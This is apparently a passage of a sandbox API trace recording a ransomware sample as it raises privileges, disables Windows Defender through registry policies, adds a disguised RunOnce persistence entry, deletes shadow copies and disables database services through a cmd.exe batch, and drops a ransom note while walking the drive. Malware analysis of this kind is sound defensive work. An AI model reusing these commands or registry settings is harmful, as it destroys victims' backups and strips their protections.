wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0038.584] GetCurrentProcess () returned 0xffffffff [0038.584] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2afb84 | out: TokenHandle=0x2afb84*=0x80) returned 1 [0038.584] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeBackupPrivilege", lpLuid=0x2ade68 | out: lpLuid=0x2ade68*(LowPart=0x11, HighPart=0)) returned 1 [0038.607] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x2ade70*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0038.607] GetLastError () returned 0x0 [0038.607] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0x2ade68 | out: lpLuid=0x2ade68*(LowPart=0x12, HighPart=0)) returned 1 [0038.607] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x2ade70*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0038.607] GetLastError () returned 0x0 [0038.608] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeManageVolumePrivilege", lpLuid=0x2ade68 | out: lpLuid=0x2ade68*(LowPart=0x1c, HighPart=0)) returned 1 [0038.608] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x2ade70*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0038.608] GetLastError () returned 0x0 [0038.608] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTakeOwnershipPrivilege", lpLuid=0x2ade68 | out: lpLuid=0x2ade68*(LowPart=0x9, HighPart=0)) returned 1 [0038.608] AdjustTokenPrivileges (in: TokenHandle=0x80, DisableAllPrivileges=0, NewState=0x2ade70*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0038.608] GetLastError () returned 0x0 [0038.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7528 [0038.608] RtlInitializeSListHead (in: ListHead=0x2e7530 | out: ListHead=0x2e7530) [0038.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e76a8 [0038.608] RtlInitializeSListHead (in: ListHead=0x2e76b0 | out: ListHead=0x2e76b0) [0038.608] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup", phkResult=0x2ade84 | out: phkResult=0x2ade84*=0xc8) returned 0x0 [0038.610] RegSetValueExW (in: hKey=0xc8, lpValueName="DisableHomeGroup", Reserved=0x0, dwType=0x4, lpData=0x2ade80*=0x1, cbData=0x4 | out: lpData=0x2ade80*=0x1) returned 0x0 [0038.611] RegCloseKey (hKey=0xc8) returned 0x0 [0038.611] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", phkResult=0x2ade84 | out: phkResult=0x2ade84*=0xc8) returned 0x0 [0038.611] RegSetValueExW (in: hKey=0xc8, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x2ade80*=0x1, cbData=0x4 | out: lpData=0x2ade80*=0x1) returned 0x0 [0038.611] RegCloseKey (hKey=0xc8) returned 0x0 [0038.611] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Policy Manager", phkResult=0x2ade84 | out: phkResult=0x2ade84*=0xc8) returned 0x0 [0038.611] RegCloseKey (hKey=0xc8) returned 0x0 [0038.611] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", phkResult=0x2ade84 | out: phkResult=0x2ade84*=0xc8) returned 0x0 [0038.612] RegSetValueExW (in: hKey=0xc8, lpValueName="DisableRealtimeMonitoring", Reserved=0x0, dwType=0x4, lpData=0x2ade80*=0x1, cbData=0x4 | out: lpData=0x2ade80*=0x1) returned 0x0 [0038.612] RegSetValueExW (in: hKey=0xc8, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x2ade80*=0x1, cbData=0x4 | out: lpData=0x2ade80*=0x1) returned 0x0 [0038.612] RegSetValueExW (in: hKey=0xc8, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x2ade80*=0x1, cbData=0x4 | out: lpData=0x2ade80*=0x1) returned 0x0 [0038.612] RegCloseKey (hKey=0xc8) returned 0x0 [0038.612] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", phkResult=0x2ade84 | out: phkResult=0x2ade84*=0xcc) returned 0x0 [0038.613] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe") returned 48 [0038.613] RegSetValueExW (in: hKey=0xcc, lpValueName="WindowsUpdateCheck", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe", cbData=0x60 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aoldtz.exe") returned 0x0 [0038.613] RegCloseKey (hKey=0xcc) returned 0x0 [0038.613] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c78e0 [0038.614] GetLastError () returned 0x0 [0038.614] SetLastError (dwErrCode=0x0) [0038.614] GetLastError () returned 0x0 [0038.614] SetLastError (dwErrCode=0x0) [0038.614] GetProcAddress (hModule=0x76c20000, lpProcName="AreFileApisANSI") returned 0x76cb40d1 [0038.614] AreFileApisANSI () returned 1 [0038.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c78e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0038.614] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2e6d30 [0038.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c78e0, cbMultiByte=-1, lpWideCharStr=0x2e6d30, cchWideChar=28 | out: lpWideCharStr="C:\\Windows\\system32\\cmd.exe") returned 28 [0038.614] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x2adde0 | out: lpFileInformation=0x2adde0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bdd4861, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8bdd4861, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8bdd4861, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x49e00)) returned 1 [0038.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6d30 | out: hHeap=0x2b0000) returned 1 [0038.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x388) returned 0x2c8eb8 [0038.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x144) returned 0x2e85f8 [0038.615] GetLastError () returned 0x0 [0038.615] SetLastError (dwErrCode=0x0) [0038.615] CreateProcessA (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /c @echo off\r\nvssadmin delete shadows /all /quiet\r\nsc config browser\r\nsc config browser start=enabled\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2add9c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x144, lpReserved2=0x2e85f8, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2adde0 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c @echo off\r\nvssadmin delete shadows /all /quiet\r\nsc config browser\r\nsc config browser start=enabled\r\nsc stop vss\r\nsc config vss start=disabled\r\nsc stop MongoDB\r\nsc config MongoDB start=disabled\r\nsc stop SQLWriter\r\nsc config SQLWriter start=disabled\r\nsc stop MSSQLServerOLAPService\r\nsc config MSSQLServerOLAPService start=disabled\r\nsc stop MSSQLSERVER\r\nsc config MSSQLSERVER start=disabled\r\nsc stop MSSQL$SQLEXPRESS\r\nsc config MSSQL$SQLEXPRESS start=disabled\r\nsc stop ReportServer\r\nsc config ReportServer start=disabled\r\nsc stop OracleServiceORCL\r\nsc config OracleServiceORCL start=disabled\r\nsc stop OracleDBConsoleorcl\r\nsc config OracleDBConsoleorcl start=disabled\r\nsc stop OracleMTSRecoveryService\r\nsc config OracleMTSRecoveryService start=disabled\r\nsc stop OracleVssWriterORCL\r\nsc config OracleVssWriterORCL start=disabled\r\nsc stop MySQL\r\nsc config MySQL start=disabled\r\n", lpProcessInformation=0x2adde0*(hProcess=0xd0, hThread=0xcc, dwProcessId=0x9d0, dwThreadId=0x9d4)) returned 1 [0038.837] WaitForSingleObject (hHandle=0xd0, dwMilliseconds=0xffffffff) returned 0x0 [0039.013] GetExitCodeProcess (in: hProcess=0xd0, lpExitCode=0x2ade00 | out: lpExitCode=0x2ade00*=0x0) returned 1 [0039.013] CloseHandle (hObject=0xcc) returned 1 [0039.013] CloseHandle (hObject=0xd0) returned 1 [0039.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e85f8 | out: hHeap=0x2b0000) returned 1 [0039.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0039.013] GetLastError () returned 0x0 [0039.013] SetLastError (dwErrCode=0x0) [0039.013] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c78e0 | out: hHeap=0x2b0000) returned 1 [0039.013] FindFirstVolumeW (in: lpszVolumeName=0x2adc74, cchBufferLength=0x104 | out: lpszVolumeName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\") returned 0x2e85f8 [0039.014] GetVolumePathNamesForVolumeNameW (in: lpszVolumeName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\", lpszVolumePathNames=0x2ada6c, cchBufferLength=0x104, lpcchReturnLength=0x2ade84 | out: lpszVolumePathNames=0x2ada6c, lpcchReturnLength=0x2ade84) returned 1 [0039.014] FindNextVolumeW (in: hFindVolume=0x2e85f8, lpszVolumeName=0x2adc74, cchBufferLength=0x104 | out: hFindVolume=0x2e85f8, lpszVolumeName="\\\\?\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\") returned 0 [0039.014] FindVolumeClose (hFindVolume=0x2e85f8) returned 1 [0039.014] GetLogicalDriveStringsW (in: nBufferLength=0x100, lpBuffer=0x2af69c | out: lpBuffer="C:\\") returned 0x4 [0039.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7708 [0039.014] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2e7d38 [0039.014] RtlInterlockedPushEntrySList (in: ListHead=0x2e7530, ListEntry=0x2e7710 | out: ListHead=0x2e7530, ListEntry=0x2e7710) returned 0x0 [0039.014] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x126fd50, lpParameter=0x2e7530, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd0 [0039.015] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2ade78 | out: lphEnum=0x2ade78*=0x2ccf28) returned 0x0 [0039.634] WNetEnumResourceW (in: hEnum=0x2ccf28, lpcCount=0x2ade7c, lpBuffer=0x2cdd90, lpBufferSize=0x2ade80 | out: lpcCount=0x2ade7c, lpBuffer=0x2cdd90, lpBufferSize=0x2ade80) returned 0x0 [0039.634] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2cdd90, lphEnum=0x2ade4c | out: lphEnum=0x2ade4c*=0x2d2300) returned 0x0 [0039.692] WNetEnumResourceW (in: hEnum=0x2d2300, lpcCount=0x2ade50, lpBuffer=0x2d2a28, lpBufferSize=0x2ade54 | out: lpcCount=0x2ade50, lpBuffer=0x2d2a28, lpBufferSize=0x2ade54) returned 0x103 [0039.692] WNetCloseEnum (hEnum=0x2d2300) returned 0x0 [0039.692] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2cddb0, lphEnum=0x2ade4c | out: lphEnum=0x2ade4c*=0x2d2300) returned 0x4b8 [0053.456] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2cddd0, lphEnum=0x2ade4c | out: lphEnum=0x2ade4c*=0x2d2300) returned 0x4c6 [0053.504] WNetEnumResourceW (in: hEnum=0x2ccf28, lpcCount=0x2ade7c, lpBuffer=0x2cdd90, lpBufferSize=0x2ade80 | out: lpcCount=0x2ade7c, lpBuffer=0x2cdd90, lpBufferSize=0x2ade80) returned 0x103 [0053.505] WNetCloseEnum (hEnum=0x2ccf28) returned 0x0 [0053.505] WaitForSingleObject (hHandle=0xd0, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x940 Thread: id = 3 os_tid = 0x9cc Thread: id = 5 os_tid = 0x9e8 [0039.215] RtlInterlockedPopEntrySList (in: ListHead=0x2e7530 | out: ListHead=0x2e7530) returned 0x2e7710 [0039.215] lstrcpynW (in: lpString1=0x111eae8, lpString2="C:", iMaxLength=2048 | out: lpString1="C:") returned="C:" [0039.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d38 | out: hHeap=0x2b0000) returned 1 [0039.215] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7708 | out: hHeap=0x2b0000) returned 1 [0039.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20) returned 0x2c9190 [0039.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7708 [0039.215] RtlInitializeSListHead (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) [0039.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7788 [0039.215] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2e7d38 [0039.215] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7790 | out: ListHead=0x2e7710, ListEntry=0x2e7790) returned 0x0 [0039.215] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x126f4b0, lpParameter=0x2c9190, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd4 [0039.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x20) returned 0x2c91b8 [0039.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77c8 [0039.216] RtlInitializeSListHead (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) [0039.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77e8 [0039.216] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2e7d48 [0039.216] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2e77f0 | out: ListHead=0x2e77d0, ListEntry=0x2e77f0) returned 0x0 [0039.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x126f4b0, lpParameter=0x2c91b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe0 [0039.217] RtlInterlockedPopEntrySList (in: ListHead=0x2e7530 | out: ListHead=0x2e7530) returned 0x0 [0039.217] WaitForMultipleObjects (nCount=0x2, lpHandles=0x111e9e8*=0xd4, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0082.340] CloseHandle (hObject=0xe0) returned 1 [0082.340] WaitForMultipleObjects (nCount=0x1, lpHandles=0x111e9e8*=0xd4, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 6 os_tid = 0x9ec [0039.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2c9f60 [0039.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d88 [0039.330] lstrcatW (in: lpString1="", lpString2="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" | out: lpString1="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe") returned="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" [0039.330] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7790 [0039.330] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:", iMaxLength=260 | out: lpString1="C:") returned="C:" [0039.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d38 | out: hHeap=0x2b0000) returned 1 [0039.330] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0039.330] lstrlenW (lpString="C:") returned 2 [0039.330] lstrcatW (in: lpString1="", lpString2="C:" | out: lpString1="C:") returned="C:" [0039.330] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0039.330] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\how to back your files.exe"), bFailIfExists=1) returned 1 [0039.340] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0039.340] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2c9b10 [0039.340] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="aoldtz.exe") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="windows") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="bootmgr") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="temp") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="pagefile.sys") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="boot") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="ids.txt") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="ntuser.dat") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="perflogs") returned -1 [0039.343] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="MSBuild") returned -1 [0039.343] lstrlenW (lpString="$Recycle.Bin") returned 12 [0039.343] lstrlenW (lpString="C:\\*") returned 4 [0039.343] lstrcpyW (in: lpString1=0x2cce406, lpString2="$Recycle.Bin" | out: lpString1="$Recycle.Bin") returned="$Recycle.Bin" [0039.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e77e8 [0039.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2c92f8 [0039.343] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e77f0 | out: ListHead=0x2e7710, ListEntry=0x2e77f0) returned 0x0 [0039.343] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="aoldtz.exe") returned 1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2=".") returned 1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="..") returned 1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="windows") returned -1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="bootmgr") returned -1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="temp") returned -1 [0039.343] lstrcmpiW (lpString1="Boot", lpString2="pagefile.sys") returned -1 [0039.344] lstrcmpiW (lpString1="Boot", lpString2="boot") returned 0 [0039.344] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0039.344] lstrcmpiW (lpString1="bootmgr", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.344] lstrcmpiW (lpString1="bootmgr", lpString2="aoldtz.exe") returned 1 [0039.344] lstrcmpiW (lpString1="bootmgr", lpString2=".") returned 1 [0039.344] lstrcmpiW (lpString1="bootmgr", lpString2="..") returned 1 [0039.344] lstrcmpiW (lpString1="bootmgr", lpString2="windows") returned -1 [0039.344] lstrcmpiW (lpString1="bootmgr", lpString2="bootmgr") returned 0 [0039.344] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="aoldtz.exe") returned 1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="windows") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootmgr") returned 1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="temp") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="pagefile.sys") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="boot") returned 1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ids.txt") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="perflogs") returned -1 [0039.344] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="MSBuild") returned -1 [0039.344] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0039.344] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0039.344] lstrcpyW (in: lpString1=0x2cce406, lpString2="BOOTSECT.BAK" | out: lpString1="BOOTSECT.BAK") returned="BOOTSECT.BAK" [0039.344] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0039.345] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0039.345] lstrlenW (lpString="Ares865") returned 7 [0039.345] lstrcmpiW (lpString1="ECT.BAK", lpString2="Ares865") returned 1 [0039.351] lstrlenW (lpString=".dll") returned 4 [0039.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".dll") returned 1 [0039.351] lstrlenW (lpString=".lnk") returned 4 [0039.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".lnk") returned 1 [0039.352] lstrlenW (lpString=".ini") returned 4 [0039.352] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".ini") returned 1 [0039.354] lstrlenW (lpString=".sys") returned 4 [0039.354] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".sys") returned 1 [0039.354] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0039.354] lstrlenW (lpString="bak") returned 3 [0039.354] lstrcmpiW (lpString1="BAK", lpString2="bak") returned 0 [0039.354] FindNextFileW (in: hFindFile=0x2c9b10, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="aoldtz.exe") returned 1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2=".") returned 1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="..") returned 1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="windows") returned -1 [0039.354] lstrcmpiW (lpString1="Config.Msi", lpString2="bootmgr") returned 